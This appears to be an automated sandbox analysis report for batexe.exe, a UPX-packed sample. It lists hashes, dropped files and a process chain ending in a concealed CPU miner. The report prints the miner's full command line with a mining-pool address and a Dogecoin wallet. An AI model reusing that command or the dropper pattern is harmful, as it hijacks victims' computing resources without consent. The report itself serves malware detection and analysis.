73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
295s
max time network
301s
platform
windows10-1703_x64
resource
win10-20231215-ja
resource tags

arch:x64arch:x86image:win10-20231215-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
12/02/2024, 09:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
4584	b2e.exe
2388	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
2388	cpuminer-sse2.exe
2388	cpuminer-sse2.exe
2388	cpuminer-sse2.exe
2388	cpuminer-sse2.exe
2388	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1404-5-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1404 wrote to memory of 4584	1404	batexe.exe	74
PID 1404 wrote to memory of 4584	1404	batexe.exe	74
PID 1404 wrote to memory of 4584	1404	batexe.exe	74
PID 4584 wrote to memory of 4720	4584	b2e.exe	75
PID 4584 wrote to memory of 4720	4584	b2e.exe	75
PID 4584 wrote to memory of 4720	4584	b2e.exe	75
PID 4720 wrote to memory of 2388	4720	cmd.exe	78
PID 4720 wrote to memory of 2388	4720	cmd.exe	78

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1404
- C:\Users\Admin\AppData\Local\Temp\14BC.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\14BC.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\14BC.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4584
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1A59.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4720
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2388

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\14BC.tmp\b2e.exe

Filesize
2.6MB

MD5
f845d6b8c0beb43591f7ebc96344f81b

SHA1
5bcb9d96f6589b559060e11d6d5a0bf73d91c80e

SHA256
841b8431f27f5e631d37c605530e6ce5430559c96fa9a6ddebc7e9dd63ad04b2

SHA512
8de293211ad14117c9ecb797c78c738c91b691f3dc861401d537cc72c9ba05a40340c452938bd6d72bf400efa1fffb7bb387f204035697b8a229a29288d5d357

Download Submit
C:\Users\Admin\AppData\Local\Temp\14BC.tmp\b2e.exe

Filesize
3.4MB

MD5
2cffc2d34c2ba279f582c09551298e08

SHA1
7278c92685d9f3166073328fa6ecc8894ea102ed

SHA256
b4e7116775251b2dd0d69054c2f026df582318e188069a6fdf2ee808401f4f73

SHA512
fcf13ea4f99a0184c830f0b468a0c93218c79c6f711af08241913cde2183e94578c0f8bf19d3ef5e6e7680c0702aea8320382cad56f4be823e6da95a05728f33

Download Submit
C:\Users\Admin\AppData\Local\Temp\1A59.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
585KB

MD5
f8daabd4abab126461f9c1fa7410f758

SHA1
1a886b8409eebc363e0317c75f0be3b633676c5f

SHA256
2a24ea798967b22b636622f46f4b0ae3d647e3dcaee64a9121f394c08842a2c0

SHA512
ce5e82879a320305d44d2c6e87ea607c04a093a2b4b5baea48eb00afbc1cd390d7509bb66c2acd6aacca6fa7e7e3641bef32f919a1dac7f4b0b4c1b410d38aad

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
583KB

MD5
bd50030e5b7b92740606c995531f70fb

SHA1
76604f6b5b0703845013b1fae9f6cbcd28759a34

SHA256
89866e0a1c3893498de42c13f77bfc3a3943309d101a87d2da443856669283b9

SHA512
5bdd6d7d28a0caf00e8bf956e1e0186de75352bcdbb691a637e637c029dc58c71cac80fca5cb52ca8dabd7aed41fa0285ed6e50c5c68c27f25181693bf1053a3

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
590KB

MD5
524342a7afe544f4c0bbef14ff319cbe

SHA1
4f498f96f5cd07f510626bd424ab6c2bd5550af1

SHA256
cb1e98d81b72359d9ffc4a935c8dbcff19be68b6315ea92afebd9857496ceb3a

SHA512
8e719452e36b27dcede9ca5b73e8b09fc134a2082dc701d78f007470bc42d063ac7ee2d2260301d1f2613e165504a18e4f9d35286f368fc98094c8bab5b8b446

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
498KB

MD5
7af8b07834d6bf24b1100f353dc9cf7a

SHA1
40376d51cac55b3a94b0ff4eb224a3b5656dfc05

SHA256
f8cb37f74817efeb00d57b4baaa4fa744290fa55d2170a1473a928971390bffa

SHA512
a705940f88de22fd3393c51adfa026c7d9c33eab3bea5415a103012707e33bea9d02a43b49afad4ea5d072dac6e0b7b6d4c7903acc22a7949a06e8cdb77ace67

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
614KB

MD5
df8dd9a5e6282001fbf39ea97d8b5090

SHA1
c0751ffda32c2ca6dab9b554d628ae0d9e7803e4

SHA256
028ec140937e71580a8e60b96b3d67f28ec5e5c2919e91d86311d82825904334

SHA512
dd65b316a0a3df6d72d3944f73915dbba2efa5b29e5b1474b9225add0d532ed0944680b8a2920905404dbb68f338030d6eca8fc250de2d3e637c5097cf280487

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
446KB

MD5
eee10e0ffaca1bee6a0d335ea4dd71ee

SHA1
b2c9cbdeeb0c4db4bdcdcfaafc791aa877362c90

SHA256
e45703faa419388a85d200bfb27f3206b1d708d8ceb730d69216359acae4273d

SHA512
c1131d43c0eec6c33194b3d1de5e726d950ecb9a6415504af724933f4f888773ea300bf3650f6a31bb5371243beb225113956f3e9a11e5457dee5e714f8bdfb3

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
772KB

MD5
4591e6b0452ad0d9c46b436f79ff1ad4

SHA1
8364dae02d7046a09f36f02809b04fe461c07caf

SHA256
41e419891ee230392fc7f309c702417ca34cb882f25598e7f87391262a2e9cbd

SHA512
358de6b295876f29272e54e4caaba5d57a372172113384cd23e72cce1ab0e60638e489f86d3902d5e8ba9c6a2f00b5064a7667dbbe41e6beeec0822014883ffa

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
782KB

MD5
c3bfeca9076ed4b290df1ad981a3bc27

SHA1
4f0fa9aeed5bcb8e686ce056163ecab29d726310

SHA256
6401577b3aea8cdac154794e14f7130abf494d4d6301121830b598997314f733

SHA512
704584be437819f9775012423183277c5148d28b0efee6147f697c1d516fee8d90f39f39f968e149ec10c39a2423986673f07e54e5ae55535e09bc1d95855656

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
448KB

MD5
ca123cec7f705c0af114e462349dc686

SHA1
75f90b4d95f6774b2f66e4ba790755ef118ab222

SHA256
7f141cdc0be9c965e21310bcfb0484b20d31ffd8a6a970f8b5a53c0e8974798a

SHA512
650125faa9ae6733f1118caf3101ca6850473f78f9bfc3a87e908eac1c69935e3bc269ffb5de4dd6e867429c1af35c7f3b9e62eb698fa7c9695d68e7115f3f1c

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
369KB

MD5
31336615d7950dd04c03d936095302dc

SHA1
c60003c49c44b5a1d6b8d0fb8a690315732616ba

SHA256
23bc1fbdef6cf84a3d22680140237c413d6285e5115b9a0980d99df0768dbfe9

SHA512
ce74f332ba07ef2c6683eab29d86b1a16c8769b4d6260063be5d9df2a9b1784e0289856d69ee101e9786d562d240e925d2d5db6abb7ade01636a9be6c7e34c7f

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
531KB

MD5
506a3e86b75a2817dfa2c58c2ab0e92b

SHA1
bfb20996afed667a7573260cdaf3f417c2b9d432

SHA256
7ff76e1e0d453179a7a75c8057d99628dac30c25f9107341ed36cf2339a78df9

SHA512
9e849abcaa1d7ab236bfe06bab28c4afa7d6c321a425c10bc74303e966efb80bf0b8ebd1a385ea989866418e3c2b73a4f6f3ae35c31104339fae8034886891b1

Download Submit
memory/1404-5-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/2388-42-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/2388-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2388-41-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2388-43-0x0000000061B90000-0x0000000061C28000-memory.dmp

Filesize
608KB

Download
memory/2388-44-0x00000000010D0000-0x0000000002985000-memory.dmp

Filesize
24.7MB

Download
memory/2388-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2388-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2388-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2388-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2388-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2388-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4584-4-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4584-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download